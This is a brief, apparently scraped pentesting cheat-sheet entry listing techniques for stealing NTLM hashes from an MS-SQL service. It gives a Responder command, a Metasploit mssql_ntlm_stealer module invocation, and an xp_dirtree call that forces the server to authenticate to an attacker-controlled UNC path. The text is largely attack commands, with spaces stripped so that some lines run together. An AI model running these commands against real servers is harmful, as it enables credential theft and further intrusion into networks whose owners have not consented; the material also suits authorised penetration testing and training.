A list of Pentesting Techniques for MS-SQL service.
Steal NTLM hash
# use responderββ$sudoresponder-I<IP>-w-d# steal from msfconsoleuseadmin/mssql/mssql_ntlm_stealersetSMBPROXY<IP>exploit# steal from ms-sql consoleSQL>execmaster.dbo.xp_dirtree'\\<IP>'